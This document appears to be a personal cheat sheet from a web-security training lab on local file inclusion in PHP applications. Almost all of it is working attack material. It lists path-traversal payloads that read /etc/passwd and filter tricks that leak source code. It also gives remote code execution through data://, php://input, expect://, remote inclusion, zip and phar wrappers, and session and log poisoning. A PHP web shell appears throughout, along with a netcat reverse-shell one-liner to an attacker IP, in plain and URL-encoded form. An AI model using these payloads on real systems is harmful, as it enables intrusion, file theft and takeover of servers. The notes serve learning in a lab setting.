LFI

/etc/passwd

../../../etc/passwd

/../../../etc/passwd

....//....//....//etc/passwd

/..//..//..//..//..//..//etc/passwd

..%2F..%2F..%2Fetc%2Fpasswd%0A

./languages/../../../../etc/passwd

/etc/./passwd

/etc/passwd%00

/etc/passwd%00.php

?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]

# just use ffuf or gobuster to discover config php 
# config is the php file just change it (config.php)
# the webserver always append the php extension
# then just decode the result
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://94.237.62.149:55270/blog/FUZZ.php

/index.php?language=php://filter/read=convert.base64-encode/resource=config

# Then just decode the base64
echo 'PD9waHAK...SNIP...KICB9Ciov' | base64 -d

# see if allow_url_include is on
# that means we can execute some rce
/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini

> curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini" > php-ini.txt

> echo 'BASE64 OF php.ini' | base64 -d | grep allow_url_include

# Then just use the data function (base64&cmd=id)
# first we have to base64 the php cmd command
> echo '<?php system($_GET["cmd"]); ?>' | base64

/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

> curl -s 'http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid

# or we could use this way
> curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid

# or we could use this way
> echo 'BASE64 OF php.ini' | base64 -d | grep expect

> curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"

?language=http://127.0.0.1:80/index.php

# just use python3 server
> echo '<?php system($_GET["cmd"]); ?>' > shell.php
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

# just use python ftp server
> sudo python -m pyftpdlib -p 21

/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id

> curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'

# just use impacket smbserver 
> impacket-smbserver -smb2support share $(pwd)

/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami

# we can just change the extension of the file before uploading
> echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
/index.php?language=./profile_images/shell.gif&cmd=id

> echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();
-------------------------------------------------------------------------------------
> php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id

# PHP session
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd

# Url encoded
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
<?php system($_GET["cmd"]);?>

# Then just include the session with cmd id
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id

# PS do the steps everytime for every rce command

• Just modify the User-Agent to "Apache Log Poisoning"

• Then change again the User-Agent to this code

'<?php system($_GET["cmd"]);?>'

Or we could use this curl command

curl -s 'http://<SERVER_IP>:<PORT>/index.php' -A '<?php system($_GET['cmd']); ?>'

For reverse shell from poisoned log

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.193.229 4444 >/tmp/f

%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%39%2e%31%39%33%2e%32%32%39%20%34%34%34%34%20%3e%2f%74%6d%70%2f%66

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287

ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287